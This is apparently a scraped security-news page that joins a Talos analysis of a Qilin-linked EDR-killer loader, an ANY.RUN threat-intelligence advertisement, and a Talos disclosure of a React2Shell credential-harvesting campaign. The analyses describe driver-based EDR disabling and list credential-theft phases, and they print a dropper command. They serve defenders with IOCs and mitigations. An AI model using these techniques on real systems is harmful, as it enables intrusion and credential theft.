After several intermediate steps, this results in a call to NtOpenSection, which triggers the previously configured hardware breakpoint and, in turn, invokes the VEH. The first time the VEH is triggered at NtOpenSection, it executes the code in Figure 29.
Figure 29. Malicious VEH, part 1: NtOpenSection handler.
It modifies the “shell32.dll” name in memory to “hasherezade_[redacted].dll”, then adjusts RIP in the context record to point to the next ret instruction (0xC3) within the NtOpenSection stub and sets a new hardware breakpoint on NtMapViewOfSection. In addition, it updates the stack pointer to reference LdrpMinimalMapModule+offset, where the offset corresponds to an instruction immediately following a call to NtOpenSection inside LdrpMinimalMapModule. It then invokes NtContinue, which resumes execution at the RIP value stored in the context record (i.e., at the ret instruction). That ret instruction subsequently transfers control to the address prepared on the stack, namely LdrpMinimalMapModule+offset.
cr_1->rsp = LdrpMinimalMapModule+offset cr_1->rip = ntdll!NtOpenSection+0x14 = ret ; jumps to <rsp> when executed
Figure 30. Jump destination after calling NtOpenSection.
During execution of LdrpMinimalMapModule, a call to NtMapViewOfSection is made, which triggers the hardware breakpoint set by the previous routine. On this occasion, the VEH executes the code in Figure 31.
Figure 31. Malicious VEH, part 2: NtMapViewOfSection handler.
It deletes all HW breakpoints and then sets the stackpointer to an address which points to an address in LdrMinimalMapModule+offset. As expected, this is right after a call to NtMapViewOfSection. In other words, the registers in the context are overwritten like this:
ctx->rsp -> ntdll!LdrpMinimalMapModule+0x23b ctx->rip -> ntdll!NtMapViewOfSection+0x14 = ret
When the return (ret) instruction is reached, it jumps to the address stored in the stack pointer (rsp).
Figure 32. Jump destination after call NtMapViewOfSection.
The subsequent code in LdrpMinimalMapModule maps the previously restored PE image into the process address space and prepares it for execution. Finally, control returns to 0x24A3C1E, the instruction immediately following the call that originally triggered the first hardware breakpoint.
Figure 33. Instruction after the call to LdrLoadDll.
After several additional fix-up steps, the loader transfers execution to Stage 4 (i.e., the loaded PE image).
Figure 34. Final jump to loaded PE.
This PE file is an EDR killer capable of disabling over 300 different EDR drivers across a wide range of solutions. A detailed analysis of this component will be provided in the next section.
Figure 35. Excerpt from the EDR driver list.
PE loader summary
The first three stages of this binary implement a sophisticated and complex PE loader capable of bypassing common EDR solutions by evading user-mode hooks through carefully crafted SEH and VEH techniques. While these methods are not entirely novel, they remain effective and should be detectable by properly implemented EDR solutions.
The loader decrypts and executes an embedded PE payload in memory. In this campaign, the payload is an EDR killer capable of disabling over 300 different EDR products. This component will be analyzed in detail in the next section.
EDR killer
Stage 4: Extracted EDR killer PE file
Besides initialization, the first thing the extracted PE from Stage 3 does is check again if the system locale matches a list of post-Soviet countries and, if it does, it crashes. This is another indicator that former stages are just a custom PE loader, which could be used to load any PE the adversaries want. Otherwise, doing the same check again is not logical.
Figure 36. Malware geo-fencing function.Figure 37. List of blocked countries.
The malware then attempts to elevate its privileges and load a helper driver. This also implies that the process must be executed with administrative privileges.
Figure 38. Privilege escalation and loading of helper driver.
The “rwdrv.sys” driver is a renamed version of “ThrottleStop.sys”, originally distributed by TechPowerUp LLC and signed with a valid digital certificate. It is legitimately used by tools such as GPU-Z and ThrottleStop. This is not the first observed abuse of this ; it has previously been leveraged in several malware campaigns.
Despite its benign origin, the driver exposes highly powerful functionality and can be loaded by arbitrary user-mode applications. Critically, it implements these capabilities without enforcing meaningful security checks, making it particularly attractive for abuse.
This driver exposes a low-level hardware access interface to user mode via input/output controls (IOCTLs). It allows a user-mode application to directly interact with system hardware.
The driver implements IOCTL handlers that provide the following capabilities:
I/O port access
Read from hardware ports (inb/inw/ind)
Write to hardware ports (outb/outw/outd)
CPU Model Specific Register (MSR) access
Read MSRs (__readmsr)
Write MSRs (__writemsr) with limited protection against modifying critical syscall/sysenter registers
Physical memory/MMIO access
Map arbitrary physical memory into kernel space using MmMapIoSpace
Create a user-mode mapping of the same memory using MmMapLockedPagesSpecifyCache
Maintain up to 256 active mappings per driver instance
Additionally, the driver tracks the number of open handles and associates memory mappings with the calling process ID.
Overall, the driver functions as a generic kernel-mode hardware access layer, exposing primitives for port I/O, MSR access, physical memory mapping, and PCI configuration operations. Such functionality is typically used by hardware diagnostic tools, firmware utilities, or low-level system utilities, but it also provides powerful primitives that could be abused if accessible from unprivileged user-mode.
The two important functions heavily used by the sample are the ability to read and write physical memory.
After loading the driver, the malware proceeds to determine the Windows version. To do so, it first resolves the required API function using a PEB-based lookup routine, a technique consistently employed throughout the sample.
Figure 41. DLL resolution.Figure 42. API function resolution.
The implementation parses the Process Environment Block (PEB) and locates the target module by finding the hash of its name. Then the ResolveExportByHash function takes the module base from the previously found DLL and parses its PE header to find the function that corresponds to the function hash. It can either provide the API function address as an PE offset or as a virtual address.
After a couple of initializations and checks, it gets the “rwdrv.sys” handle, followed by the EDR-related part of the sample — the kernel tricks which are responsible for avoiding, blinding, and disabling the EDR.
Figure 43. Get driver handle for “rwdrv.sys”.Figure 44. Overview of the EDR killer part of the sample.
However, let’s have a brief look into the details. It starts with building a vector of physical memory pages. This vector will later be used in subsequent methods.
Figure 45. Initialization logic of the Page Frame Number (PFN) metadata list.
The SetMemLayoutPointer function in the if statement above leverages the NtQuerySystemInformation API function to gather the Superfetch information about the physical memory pages. It stores a pointer to this information in global variables (mem_layout_v1_ptr or mem_layout_v2_ptr). Which one is used depends on the version variable which is the argument handed over to the function. In our case, 1 is for calling the function the first time and 2 is for the second time. In other words, it brute-forces whichever version works for the Windows system it is running on.
Figure 46. Superfetch structure and NtQuerySystemInformation call.
The BuildSuperfetchPfnMetadataList function is quite large and complex. Simplified, it starts by using the mem_layout pointer to calculate the total page count.
Figure 47. Total Page count algorithm.
It then ends by using NtQuerySystemInformation again to get the physical pages and their meta data to store this information in a global vector (g_PfnVector).
Figure 48. Superfetch structure.Figure 49. Build global physical memory list Vector.
Back to the block from the above, the next step blinds the EDRs by deleting their callbacks for certain operations (e.g., process creation, thread creation, and image loading events).
Figure 50. Deleting EDR callbacks.
The unregister_callbacks function iterates through a list of over 300 driver names which are stored in the sample.
Figure 51. EDR driver name list.Figure 52. unregister_callbacks function.
It also demonstrates the overall implementation of the malware, which is also used in several other functions. It uses a certain API function to calculate an offset to the function or object it is really using — in this case, the kernel callback cng!CngCreateProcessNotifyRoutine. It also does not touch this object in the process virtual address space. It uses the driver loaded earlier (“rwdrv.sys”) to get the physical memory address of it. The logic and driver communication is implemented in the read_phy_bytes function, and the same for overwriting memory; the write_to_phy_mem function is used to handle the driver communications. The DeviceIoControlImplementation function which talks to the driver is implemented in write_to_phy_mem.
Figure 53. DeviceIoControlImplementation function called in write_to_phy_mem.
The other callback-related functions shown in Figure 44 work similarly to the one we discussed. They overwrite or unregister other EDR-specific callbacks, which were set by the EDR Mini-Filter driver.
The final part of the EDR killer begins by loading another driver (“hlpdrv.sys”).
Figure 54. Load and use of hlpdrv.sys.
The malware uses the driver to terminate EDR processes running on the system using the IOCTL code 0x2222008. This executes the function in the driver which is responsible for unprotecting and terminating the process.
Figure 55. Terminate protected process function in hlpdrv.sys.
Once terminated, EDR processes such as Windows Defender no longer run, as demonstrated in Figure 56.
Figure 56. Terminated Windows Defender process.
Additionally, it restores the CiValidateImageHeader callback. The RestoreCiValidateImageHeaderCallback function is shown in Figure 57.
Figure 57. Restoring code integrity checks.
This is accomplished using the same concept we previously saw in Figure 52:
Resolve a known API function.
Use this function as an anchor point to locate a specific instruction within its code.
This instruction contains a pointer in one of its operands that points to, or near, the object of interest.
Identify the pointer to the target object within that instruction.
Perform a sign extension on the operand.
Add an additional offset to compute the final address of the object being sought — in this case, the CiValidateImageHeader callback.
Restore the original function pointer to CiValidateImageHeader.
Note that the malware had previously overwritten the callback to CiValidateImageHeader with the address of ArbPreprocessEntry, a function that always returns true. In other words, it has now restored the original Code Integrity check.
Summary
This blog was a technical deep dive into the infection chain that is hidden in the malicious “msimg32.dll”, which has been observed during Qilin ransomware attacks. It demonstrates the sophisticated tricks the malware is employing to circumvent or completely disable modern EDR protection features on compromised systems.
It is encouraging to see how many hurdles modern malware must overcome. At the same time, this highlights that even state-of-the-art defense mechanisms can still be bypassed by determined adversaries. Defenders should never rely on a single product for protection; instead, Talos strongly recommends a multi-layered security approach. This significantly increases the difficulty for attackers to remain undetected, even if they manage to evade one line of defense.
Coverage
The following ClamAV signatures detect and block this threat:
Win.Malware.Bumblebee-10056548-0
Win.Tool.EdrKiller-10059833-0
Win.Tool.ThrottleStop-10059849-0
The following SNORT® rules (SIDs) detect and block this threat:
Covering Snort2 SID(s): 1:66181, 1:66180
Covering Snort3 SID(s): 1:301456
Indicators of compromise (IOCs)
The IOCs for this threat are also available at our GitHub repository here.
Reaching a higher level of SOC maturity takes better, more consistent decision-making during malware and phishing investigation.
This requires a shift in how threat intelligence is used: not as a reference point, but as a core layer in the decision process.
Moving from reactive to confidently proactive security means establishing a threat intelligence workflow that:
Solve key challenges, from alert fatigue to blind spots
Integrate across SOC workflows, supporting them
Deliver compounding value as a unified system
In this model, threat intelligence becomes part of the SOC’s operational fabric. That’s what ANY.RUN Threat Intelligence is designed for.
It becomes a layer inside your SOC’s operations. A layer that provides behavioral context, workflow support, and data delivery for faster triage, incident response, and threat hunting.
Read further to see how it changes each stage of your SOC operations.
Key takeaways
Threat intelligence must move from data to decisions, as its value is measured by how it improves SOC actions, not how much data it provides.
Context is the differentiator. Linking IOCs to behavior and TTPs is what enables accurate triage and detection.
Unified TI drives consistency in SOC teams, embedding intelligence across workflows.
Operationalized TI compounds over time. Every investigation strengthens detection, automation, and future response.
ANY.RUN’s threat intelligence is built on live attack data that provides unique, real-time visibility into emerging threats and supports the full investigation cycle.
Solving Key SOC Challenges with Behavioral TI
Most threat intelligence today is still delivered as bare indicator feeds, standalone reports, or enrichment tools with fragmented intelligences that exist outside the core SOC workflow.
In this model, threat intelligence behaves as an input, not as part of the system itself. Indicators without context create noise. Context without operationalization creates friction. As a direct outcome, SOCs struggle with:
Time-consuming manual enrichment
Operational bottlenecks across processes
Detection that gets delayed by the lack of fresh data
Human-centered challenges in SOC teams are often not analysts’ fault either. Alert fatigue and unnecessary escalations stem from fragmented, hard-to-access threat data that fails to deliver usable context during investigations.
The path to improvement lies in acquiring actionable threat intelligence that operationalizes SOC tasks and completes the workflow, supporting the entire investigation cycle.
Reach a higher level of SOC maturity
Behavioral threat intelligence for proactive action
Threat Intelligence That Offers More than Just Indicators
What SOC teams require is actionable intelligence that supports decisions and execution, enabling analysts to move from enrichment to understanding, and from understanding to detection and rapid response.
Where traditional TI may fail because of its fragmented, add-on nature, actionable threat intelligence encompasses the entire malware and phishing investigation cycle by:
Supporting both automation and analyst-driven workflows
This is threat intelligence that doesn’t exist beside your SOC, but an essential operational layer within it that turns repetitive work into a scalable workflow where each detection enhances overall security and proactive protection from similar threats in the future.
A key differentiator of effective threat intelligence is its foundation in live, real-world attack activity.
ANY.RUN Threat Intelligence is built on continuously analyzed data from over 15,000 organizations and 600,000 analysts conducting daily malware and phishing investigations worldwide. This creates a unique, constantly evolving dataset of active threats processed and validated to minimize noise.
Operational Impact of Actionable Threat Intelligence
For analysts
Less manual work, faster understanding of threats, confident decisions during triage and investigation
For SOC leaders
Improved detection quality, reduced dwell time; consistent, predictable operations across teams
For CISOs
Lower risk exposure, better visibility into threats and coverage gaps; stronger confidence in security effectiveness and ROI
ANY.RUN’s TI As an Operational Layer in Your SOC
ANY.RUN’s approach to behavioral threat intelligence is built around the idea of treating it not as a dataset but as an operational layer that connects context and action across the SOC lifecycle.
This approach reframes TI from a passive resource into an active component of the SOC system that:
1. Links Isolated IOCs to malware behavior and TTPs via TI Lookup
Instead of treating indicators as isolated data points, with Threat Intelligence Lookup (TI Lookup), a solution for instant enrichment and threat research, analysts immediately see how they behave in real attacks. Any artifact (IP, domain, hash, or URL) is enriched with execution context, infrastructure relationships, and associated TTPs.
This allows teams to move from “what is this?” to “how does this operate?” within seconds, improving triage quality and enabling faster, more confident decisions.
IP identified as Moonrise RAT infrastructure, enriched with linked behavioral analyses and attack context. TI Lookup
Turn intelligence into action
Make confident decisions with ANY.RUN’s TI
2. Embeds context directly into triage and response
Integration opportunities for ANY.RUN Threat Intelligence
Whether through integrations or manual use, threat intelligence from ANY.RUN becomes a part of the SOC investigation cycle that supports early detection and smart decisions.
3. Enables conversion of intelligence into detections via YARA Search
YARA Search accumulating artifacts and sandbox analyses
Threat intelligence becomes particularly valuable when it directly translates into detections. YARA Search enables that by helping analysts test, refine, validate, and create YARA rules to ensure coverage of relevant threats with reduced false positives.
The result is more reliable detections and greater confidence in security controls.
4. Delivers continuous, real-time intelligence streams via TI Feeds
TIFeeds streamline operations with 99% unique threat data
Threat Intelligence Feeds are continuously delivered into existing security pipelines rather than accessed on demand, and that’s how real-time, validated indicators sourced from live attack data flow directly into SIEM, SOAR, and EDR systems, supporting automated detection, correlation, and response.
This reduces manual workload, improves alert quality, and lowers dwell time.
5. Fills visibility gaps with TI Reports
TI Reports, a module of ANY.RUN’s Threat Intelligence
ANY.RUN TI Reports address the partial visibility challenge in SOC teams by providing threat overviews curated by our experts, turning analyst-driven insights into strategic intelligence with threat behaviors, TTPs, and detection opportunities already described and contextualized.
This enables teams to quickly understand emerging risks, validate their coverage, and identify blind spots without investing additional investigation time.
Threat Intelligence Across Processes and Outcomes
ANY.RUN Threat Intelligence’s goal is not to improve a single step, but to encompass the entire operational cycle.
SOC Process
ANY.RUN’s Threat Intelligence Action
Outcomes
Triage and Alert Enrichment
Centralized validation of indicators with immediate context and prioritization; scalability for teams of any size and secure integration
Behavior-driven search with access to real attack data and analyses; supports conversion of findings into detections
Proactive threat discovery, stronger and more consistent detections, elimination of repetitive work
Incident Response
Immediate access to unified threat context across incidents, enabling consistent investigation and decision-making
Faster response, reduced dwell time, lower operational risk
SOC Management & Performance
Continuous, real-time intelligence aligned with current threats; visibility into threat landscape and coverage gaps
Improved MTTD/MTTR,measurable SOC performance, clearer ROI, and risk reduction
Conclusion
High-performing SOCs are defined by how effectively threat intelligence is integrated into their operations.
When threat intelligence components operate as a unified system rather than isolated capabilities, they stop being tools and become part of the SOC’s operational infrastructure.
In this model, Threat Intelligence is:
a unified, behavior-driven intelligence layer;
a continuous link from indicators to behavior and from detection to automation;
a real-time stream of relevant, active threat data;
embedded across triage, incident response, threat hunting, detection, and management.
About ANY.RUN
ANY.RUN provides interactive malware analysis and behavior-driven threat intelligence solutions designed to support real-world SOC operations. The platform enables security teams to understand threats faster, make informed decisions, and operationalize intelligence across detection and response workflows.
Used by over 15,000 organizations and 600,000 security professionals worldwide, ANY.RUN delivers continuously updated intelligence based on live attack analysis. The company is SOC 2 Type II certified, ensuring strong security controls and protection of customer data.
FAQ
What is ANY.RUN Threat Intelligence?
ANY.RUN Threat Intelligence features TI Lookup, TI Feeds, TI Reports, and YARA Search as a unified, behavior-driven intelligence layer that connects indicators with malware behavior, TTPs, and artifacts—supporting decision-making across SOC workflows.
How is it different from traditional threat intelligence?
Traditional feeds primarily deliver indicators. ANY.RUN’s TI provides context, behavioral analysis, and enables conversion into detections, while continuously integrating into SOC processes.
What data is it based on?
It is built on real-time analysis data from over 15,000 organizations and 600,000 analysts conducting malware and phishing investigations worldwide.
How does it improve SOC operations?
By reducing manual enrichment, accelerating triage and response, improving detection quality, and enabling more consistent, data-driven decisions.
Does it support both manual and automated workflows?
Yes. It is designed to be used both manually by analysts and automatically via integrations with SIEM, SOAR, EDR, and other platforms.
How does it help reduce risk?
By providing early visibility into emerging threats, improving detection coverage, and shortening the time between threat emergence and response.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2026-04-02 11:06:352026-04-02 11:06:35From Reactive to Proactive: 5 Steps to SOC Maturity with Threat Intelligence
Cisco Talos is disclosing a large-scale automated credential harvesting campaign carried out by a threat cluster we are tracking as “UAT-10608.”
Post-compromise, UAT-10608 leverages automated scripts for extracting and exfiltrating credentials from a variety of applications, that are then posted to its command and control (C2).
The C2 hosts a web-based graphical user interface (GUI) titled “NEXUS Listener” that can be used to view stolen information and gain analytical insights using precompiled statistics on credentials harvested and hosts compromised.
Talos is disclosing a large-scale automated credential harvesting campaign carried out by a threat cluster we currently track as UAT-10608. The campaign is primarily leveraging a collection framework dubbed “NEXUS Listener.” The systematic exploitation and exfiltration campaign has resulted in the compromise of at least 766 hosts, as of time of writing, across multiple geographic regions and cloud providers. The operation is targeting Next.js applications vulnerable to React2Shell (CVE-2025-55182) to gain initial access, then is deploying a multi-phase credential harvesting tool that harvests credentials, SSH keys, cloud tokens, and environment secrets at scale.
The breadth of the victim set and the indiscriminate targeting pattern is consistent with automated scanning — likely based on host profile data from services like Shodan, Censys, or custom scanners to enumerate publicly reachable Next.js deployments and probe them for the described React configuration vulnerabilities.
The core component of the framework is a web application that makes all of the exfiltrated data available to the operator in a graphical interface that includes in-depth statistics and search capabilities to allow them to sift through the compromised data.
This post details the campaign’s methodology, tools, breadth and sensitivity of the exposed data, and the implications for organizations impacted by this activity.
This analysis is based on data collected for security research purposes. Specific credentials and victim identifiers have been withheld from this publication.Talos has informed service providers of exposed and at-risk credentialsand is working with industry partners such as GitHub and AWS to quarantine credentials and inform victims.
Metric
Count
Compromised hosts
766
Hosts with database credentials
~701 (91.5%)
Hosts with SSH private keys
~599 (78.2%)
Hosts with AWS credentials
~196 (25.6%)
Hosts with shell command history
~245 (32.0%)
Hosts with live Stripe API keys
~87 (11.4%)
Hosts with GitHub tokens
~66 (8.6%)
Total files collected
10,120
Initial access
UAT-10608 targets public-facing web applications using components, predominately Next.js, that are vulnerable to CVE-2025-55182, broadly referred to as “React2Shell.”
React2Shell is a pre-authentication remote code execution (RCE) vulnerability in React Server Components (RSC). RSCs expose Server Function endpoints that accept serialized data from clients. The affected code deserializes payloads from inbound HTTP requests to these endpoints without adequate validation or sanitization.
Exploitation steps
An attacker identifies a publicly accessible application using a vulnerable version of RSCs or a framework built on top of it (e.g., Next.js).
The attacker crafts a malicious serialized payload designed to abuse the deserialization routine — a technique commonly used to trigger arbitrary object instantiation or method invocation on the server.
The payload is sent via an HTTP request directly to a Server Function endpoint. No authentication is required.
The server deserializes the malicious payload, resulting in arbitrary code execution in the server-side Node.js process.
Once the threat actor identifies a vulnerable endpoint, the automated toolkit takes over. No further manual interaction is required to extract and exfiltrate credentials harvested from the system.
Automated harvesting script
Data is collected via nohup-executed shell scripts dropped in /tmp with randomized names:
/bin/sh -c nohup sh /tmp/.eba9ee1e4.sh >/dev/null 2>&1
This is consistent with a staged payload delivery model. The initial React exploit delivers a small dropper that fetches and runs the full multi-phase harvesting script. Upon execution, the harvesting script iterates through several phases to collect various data from the compromised system, outlined below:
environ – Dump running process environment variables
jsenv – Extract JSON-parsed environment from JS runtime
ssh – Harvest SSH private keys and authorized_keys
tokens – Pattern-match and extract credential strings
proc_all – Aggregate all process environment variables
The framework leverages a meta.json file that tracks execution state:
Following the completion of each collection phase, an HTTP request is made back to the C2 server running the NEXUS Listener component. In most cases, the callback takes place on port 8080 and contains the following parameters:
Hostname
Phase
ID
Some examples of the full URL, executed after each phase:
After data is exfiltrated from a compromised system and sent back to the C2 infrastructure, it is stored in a database and made available via a web application called NEXUS Listener. In most instances, the web application front end is protected with a password, the prompt for which can be seen in Figure 1.
Figure 1.NEXUS Listener Login Prompt.
In at least one instance, the web application was left exposed, revealing a wealth of information, including the inner workings of the application itself, as well as the data that was harvested from compromised systems.
Figure 2.NEXUS Listener homepage with statistics.
The application contains a listing of several statistics, including the number of hosts compromised and the total number of each credential type that were successfully extracted from those hosts. It also lists the uptime of the application itself. In this case, the automated exploitation and harvesting framework was able to successfully compromise 766 hosts within a 24-hour period.
Figure 3.NEXUS Listener victims list.
The web application allows a user to browse through all of the compromised hosts. A given host can then be selected, bringing up a menu with all of the exfiltrated data corresponding to each phase of the harvesting script.
The observed NEXUS Listener instances display “v3” in the title, indicating the application has gone through various stages of development before reaching the currently deployed version.
Analysis
Cisco Talos was able to obtain data from an unauthenticated NEXUS Listener instance. The following is an analysis of that data, broken down by credential category.
Credential Categories
Environmentsecrets and APIkeys
The “environ.txt” and “jsenv.txt” files contain the runtime environment of each compromised application process, exposing a variety of third-party API credentials:
AI platform keys: OpenAI, Anthropic, NVIDIA NIM, OpenRouter, Tavily
Payment processors: Stripe live secret keys (sk_live_*)
Communication platforms: SendGrid, Brevo/Sendinblue transactional email API keys, Telegram bot tokens and webhook secrets
Source control: GitHub personal access tokens, GitLab tokens
Database connection strings: Full DATABASE_URL values including hostnames, ports, usernames, and cleartext passwords
Custom application secrets: Auth tokens, dashboard passwords, webhook signing secrets — often high-entropy hex or Base64 strings
SSHprivatekeys
Present in 78% of hosts, the “ssh.txt” files contain complete PEM-encoded private keys (both ED25519 and RSA formats) along with authorized_keys entries. These keys enable lateral movement to any other system that trusts the compromised host’s key identity — a particularly severe finding for organizations with shared key infrastructure or bastion-host architectures.
Cloudcredentialharvesting
The “aws_full.txt” and “cloud_meta.txt” phases attempt to query the AWS Instance Metadata Service (IMDS), GCP metadata server, and Azure IMDS. For cloud-hosted targets, successful retrieval yields IAM role-associated temporary credentials — credentials that carry whatever permissions were granted to the instance role, which in misconfigured environments can include S3 bucket access, EC2 control plane operations, or secrets manager read access.
Kubernetesserviceaccounttokens
The “k8s.txt” phase targets containerized workloads, attempting to read the default service account token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token. A compromised Kubernetes token can allow an attacker to enumerate cluster resources, read secrets from other namespaces, or escalate to cluster-admin depending on RBAC configuration.
Dockercontainerintelligence
For hosts running Docker (approximately 6% of the dataset), the “docker.txt” phase enumerates all running containers, their images, exposed ports, network configurations, mount points, and environment variables. Notable services observed include phpMyAdmin instances, n8n workflow automation, and internal administrative dashboards — all of which are high-value targets for follow-on access.
Shellcommandhistory
Command history files reveal operator behavior on compromised systems and other information that could be useful for post-compromise activity. Observed patterns include:
MySQL client invocations with explicit credentials: mysql -u root -p
Database service management: /etc/init.d/mysqld restart
Implications
Credentialcompromise andaccounttakeover: Every credential in this dataset should be considered fully compromised. Live Stripe secret keys enable fraudulent charges and refund manipulation. AWS keys with broad IAM permissions enable cloud infrastructure takeover, data exfiltration from S3, and lateral movement within AWS organizations. Database connection strings with cleartext passwords provide direct access to application data stores containing user personally identifiable information (PII), financial records, or proprietary data.
Lateralmovement via SSH: The large corpus of exposed SSH private keys creates a persistent lateral movement risk that survives the rotation of application credentials. If any of these keys are reused across systems (a common operational practice), the attacker retains access to those systems even after the initial compromise is detected and remediated.
Supplychainrisk: Several hosts show evidence of package registry authentication files (“pkgauth.txt”), including npm and pip configuration with registry credentials. Compromised package registry tokens could enable a supply chain attack — publishing malicious versions of packages under a legitimate maintainer’s identity.
Dataaggregation andintelligencevalue: Beyond the immediate operational value of individual credentials, the aggregate dataset represents a detailed map of the victim organizations’ infrastructure: what services they run, how they’re configured, what cloud providers they use, and what third-party integrations are in place. This intelligence has significant value for crafting targeted follow-on attacks, social engineering campaigns, or selling access to other threat actors.
Reputational andregulatoryexposure: For any organization whose data appears in this set, there are serious compliance implications. Database credentials exposing PII trigger breach notification requirements under GDPR, CCPA, and sector-specific regulations. Organizations that process payments whose Stripe keys are exposed face PCI DSS incident response obligations. The exposure of AI platform API keys can result in significant unauthorized usage charges in addition to the security risk.
Recommendations
Audit getServerSideProps and getStaticProps implementations: Ensure no secrets or server-only environment variables are passed as props to client components.
Enforce NEXT_PUBLIC_ prefix discipline: Only variables that are intentionally public should carry this prefix. Audit all variables for misclassification.
Rotate all credentials immediately if any overlap with the described victim profile is suspected.
Implement IMDSv2 enforcement on all AWS EC2 instances to require session-oriented metadata queries, blocking unauthenticated metadata service abuse.
Segment SSH keys: Avoid reusing SSH key pairs across different systems or environments.
Enable cloud provider secret scanning: AWS, GitHub, and others offer native secret scanning that can detect and alert on committed or exposed credentials.
Deploy runtime application self-protection (RASP) or a WAF rule set tuned for Next.js-specific attack patterns, particularly those targeting SSR data injection points.
Audit container environments for least-privilege. Application containers should not have access to the host SSH agent, host filesystem mounts containing sensitive data, or overly permissive IAM instance roles.
Coverage
SNORT® ID for CVE-2025-55182, aka React2Shell: 65554
Indicators of compromise (IOCs)
Organizations should investigate for the following artifacts on web application hosts:
Unexpected processes spawned from /tmp/ with randomized dot-prefixed names (e.g., /tmp/.e40e7da0c.sh)
nohup invocations in process listings not associated with known application workflows
Unusual outbound HTTP/S connections from application containers to non-production endpoints
Evidence of __NEXT_DATA__ containing server-side secrets in rendered HTML
IOCs for this threat also available on our GitHub repository here.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2026-04-02 04:06:352026-04-02 04:06:35Digital assets after death: Managing risks to your loved one’s digital estate